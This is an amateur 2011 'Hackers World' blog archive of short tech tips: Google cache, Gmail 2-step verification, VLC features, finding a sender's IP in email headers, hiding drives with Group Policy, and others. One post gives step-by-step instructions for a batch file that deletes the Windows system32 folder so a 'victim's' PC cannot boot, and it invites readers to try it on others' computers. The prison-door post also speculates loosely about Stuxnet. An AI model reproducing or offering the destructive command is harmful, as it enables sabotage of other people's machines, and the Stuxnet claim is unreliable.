Tuesday 29 November 2011

What are Google Cached Pages?


Welcome to Hackers world!!!!!


Do you know what is the meaning of cached word? When we open any website Through google in below the name of website a small link is show Cached.actually Google takes a snapshot of each page it examines and caches (stores) that version as a back-up. The cached version is what Google uses to judge if a page is a good match for your query.
Practically every search result includes a Cached link. Clicking on that link takes you to the Google cached version of that web page, instead of the current version of the page. This is useful if the original page is unavailable because of:
  • Internet congestion
  • A down, overloaded, or just slow website
  • When owner or Administrator implement Restriction to open the website.
Sometimes you can access the cached version from a site that otherwise require registration or a subscription.
Note: Since Google’s servers are typically faster than many web servers, you can often access a page’s cached version faster than the page itself.
If Google returns a link to a page that appears to have little to do with your query, or if you can’t find the information you’re seeking on the current version of the page.
 Thanks for Reading This Article.Hope you will like……
Be a good Hacker and save the Nation!!!!!

Thanks & Regards
Tarun Arora

Friday 25 November 2011

What is 2-Step Verification in Gmail Account


Welcome to Hackers World!!!!!

2-step verification adds an extra layer of security to your users' Google accounts by requiring them to enter a verification code in addition to their username and password, when signing in to their account.

2-step verification helps protect a user's account from unauthorized access should someone success to obtain their password. Even if a password is cracked, guessed, or otherwise stolen, an attacker can't sign in without access to the user's verification codes, which only the user can obtain via their own mobile phone.

Requirements

  • A mobile phone that can receive the verification code via text message.
The user enrolls in 2-step verification, and selects the method for receiving their verification code on their mobile phone: the Google Authenticator app, text message, or phone call. How quickly they get their code via text message or phone call depends on their service provider and location.

·        To Implement the 2-step Verification you need to follow this:
1.      Sign in to your Google Apps Gmail Account and click Settings (in the top right corner).
2.      Under the Accounts tab, click Google Account settings.
3.      Under Personal Settings, click Using 2-step verification
4.      Follow the steps in the 2-step verification guide to set up 2-step verification.

Administrators can point users to Getting started with 2-step verification for step-by-step instructions.
The next time the user signs in to their Google Apps account on a new browser or device, they enter their username and password as usual. They're then prompted with a second page to enter a verification code. When your user checks Remember verification for this computer, they're only prompted to enter a verification code once every 30 days per browser or after deleting their browser's cookies. Your users should not check this if they're at a public or shared computer.


 Depending on how they opted to receive their code, the user gets their time-based, one-time code from the Google Authenticator app on their smartphone or via text message or phone call. They then enter the code to successfully sign in.
If a user loses their phone, they can use backup codes to sign in. See Signing in using backup codes.
Thanks for reading this article.Hope you will like…..

Be a good Hacker and save the Nation!!!!!


Thanks & Regards
Tarun Arora

Tuesday 22 November 2011

How to Send Large Files in Gmail, Yahoo


Welcome to Hackers World!!!!!

Gmail, Yahoo etc and this becomes a big problem when we have to send large files then we have to use services like File Sharing sites.
In This Kind of Situation anyone can use this site www.transferbigfiles.com  to attach large files, up to 100MB in an Email for free. You can register for free. The only disadvantage to this service is that the file that has sent should be downloaded within 5 days. This will give you the following details of the attached file:
Who downloaded the emailed files
Sent date
Sent to whom (if you send it to a group, who are they) etc
 Another advantage of using this is you can simply share the files to others

Thanks for Reading This Article. Hope you will like it……

Be a Good Hacker and save the Nation!!!!!.

Thanks & Regards
Tarun Arora

Tuesday 15 November 2011

HOW TO DAMAGE THE SYSTEM BY DELETING SYS32 FOLDER


Welcome To Hackers World!!!!!


I m here explain to make a file that destroys ur victims pc

1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so thik again before trying this on anyone's pc)

Thanks for Reading This Article hope you will Like.

Be a good Hacker and save the Nation!!!!


Thanks & Regards
Tarun Arora

Monday 14 November 2011

HAcKERS wORLD: FETURES OF VLC MEDIA PLAYER THAT YOU DO NOT KNOW

HAcKERS wORLD: FETURES OF VLC MEDIA PLAYER THAT YOU DO NOT KNOW

FETURES OF VLC MEDIA PLAYER THAT YOU DO NOT KNOW


Welcome to Hackers World!!!!!

 

For most people, VLC is the favorite media player because it plays everything they throw at it without hiccups. No hunting for codec. But VLC can do a lot of other things as well. Find out how many of these listed below you knew, and how many you did not.

1. Rip DVDs: VLC includes a basic DVD ripper. You probably would never use it when there are better DVD rippers available, but it helps to know that you can in fact, get a decent quality DVD rip with VLC. To rip a movie follow these steps:
Go to the Media menu and choose Convert/Save. Click on the Disc tab.
Here you can adjust the Starting Position and rip only specific titles or chapters.
Enter file name making sure to end with .MPG, and start ripping.
Click Save.
2. Record videos: With the new VLC, you can record videos during playback. The record button is hidden by default. To see it, click on View>Advanced Control. The record button will now appear. Clicking on the button while playing a movie or video will start recording. Clicking again will stop recording.
3. Play RAR files: Do you know VLC can play videos zipped inside RAR files? They play like normal video files and you can even use the seek bar. If the RAR file is split into several files, no problem. Just load the first part (.part001.rar ) and it will automatically take the rest of the parts and play the whole file.
4. Play in ASCII mode: VLC media player has an amusing ability, to playback movies in ASCII art. To enable ASCII mode, open VLC media player and click on Tools>Preferences. Open the section “Video” section and under “Output” select “Color ASCII art video output” from the drop down menu. Save it. Now play any video file to enjoy the ASCII art.
5. Listen to online radio: VLC includes hundreds of Shoutcast radio stations. You just need to enable it through Media>Services Discovery>Shoutcast radio listings. Now, open the Playlist and browse through the stations.
6. Convert Audio and Video formats: In VLC you can convert video and audio files from one format to another. Several different formats are supported like MP4, WMV, AVI, OGG, MP3 etc. To access the converter:
Go to Media>Convert/Save.
Load the file you want to convert using the Add button and click Convert.
Now choose the output format and output file location.

Thanks for Reading this Article…
Be a Good Hacker and Save the Nation!!!!!

Thanks & Regards
Tarun Arora

Sunday 13 November 2011

Computerized Prison doors Can Be Hacked With Stuxnet Worm


Welcome to Hackers world!!!!!

 


Computer researchers John Strauchs, Tiffany Rad and Teague Newman have recently discovered a way to hack into computerized prison doors without any difficulty. It just took security researchers very few amount of equipment and a baseband workspace.

According To Strauchs:

"I designed a maximum security prison security system. That is, I did the engineering quite a few years ago and literally on Christmas Eve, the warden of that prison after it was occupied, called me and told me all the doors had popped open, including on death row, which of course sent chills down my spine. So we fixed that problem very quickly. It was a minor technical thing that had to do with the equipment used, but the gist of it was it made me think if that could be done accidentally, what was the extent of what you could do if you did it deliberately?"


The same mechanism which was used in the Industrial system was used in the computerized prison doors and as Industrial systems were widely being targeted with the stuxnet worm, There is a strong possibility that the computerized prison doors were hacked with the stuxnet worm.

The Us department of homeland security has confirmed that the attack was successfully carried out. We will update you as soon as we receive more news.

Thanks for Reading this Article…

Be a good Hacker and save the Nation.!!!!


Thanks & Regards
Tarun Arora
Tarora89@gmail.com





find out IP address of the sender in gmail

www.hackersworld-tarunarora.blogspot.com


Welcome to Hackers World!!!!!

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender.

* Log into your Gmail account with your username and password.
* Open the mail.
* To display the headers,
o Click on More options corresponding to that thread. You should get a bunch of links. Click on Show original
* You should get headers like this:
o Gmail headers : Daniel
* Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245.
* That is be the IP address of the sender!!


Thanks for reading this Article, Hope will you like.

                        Be a good Hacker and save the Nation.


Thanks & Regards
Tarun Arora
Tarora89@gmail.com



Friday 11 November 2011

How to hide and lock hard disk drive


Welcome to Hacker’s World!!!!!

Click on the "Start" button. Go to "Run", type "gpedit.msc” without quotes and press enter.
2
Wait for the "Group Policy" window to appear. Click on the "+" button behind "Administrative Templates". Then click the "+" button beside "Windows Components" and then click "Windows
3
Search for "Hide these specified drives in My Computer" in the options that appear in the right column of the window. Double click it, enable it and choose the drive(s) you want to hide.
Search for "Prevent access to drives from My Computer". Double click it and repeat the previous step if you want to stop accessing any drive by "command" (e.g, by typing "C:" in the address bar or "Run")
.
Close the group policy window.
6
Restart your computer for changes

            Thanks for reading this Article, Hope will you like.
            Be a Good Hacker and Save the Nation.
Thanks & Regards
Tarun Arora
Tarora89@gmail.com

Thursday 10 November 2011

Hidden Bluetooth software in window xp and vista


Welcome to Hacker’s World!!!!!

Now you don’t need to install any software for your blutooth device.You don’t know but ,there is a hidden bluetooth software in your window xp and vista :-
You can use this software as follows…
1.Open the run command
2.Now type ‘fsquirt’ without quotes
3.Now just select what you want to do ,transfer or download..
enjoy..
hope it will work….


Thanks for Reading This Article,Hope you will like.

Be a Good Hacker and Save the Nation.


Thanks & Regards
Tarun Arora
Tarora89@gmail.com

Wednesday 9 November 2011

Introduction Myself

Welcome to Hackers World!!!!!
Hi This is Tarun Arora a Student of Ethical Hacking and Network Security.This is My first blog and i have just posted my introduction,.I belong to Ferozepur City a Small town of Punjab.my Qualificaton is BCA,CCNA,CCNP,CCNA SECURITY,PURSUING CCIE SECURITY AND CCIE ROUTING AND SWITCHING , CEH..all the credit goes to my Teachers my friends who have inspired me to create a blog and share my information on internet.I heartly thankful to my Friend Vishal who is very good software and web developer.He has a lot of knowldge of programming.He always help me out whenever i get in a struck.I am greatly thankful to my Teachers Amandeep Batra and Preeti Narula both.They both are my favourite teachers.They always encourage me.and I also Thankful to my Friend SAHIL MAHAJAN who taught me the basics of ethical hacking.He always help me,He always solve my Queries.He is Very good Ethical Hacker.I am heartly thankful to Sahil Mahajan.This is my first blog and shortly i will start posting new blogs which will hepl you a lot.Thanks a lot for reading it.

Be a good  Hacker and Protect our Nation.

Thanks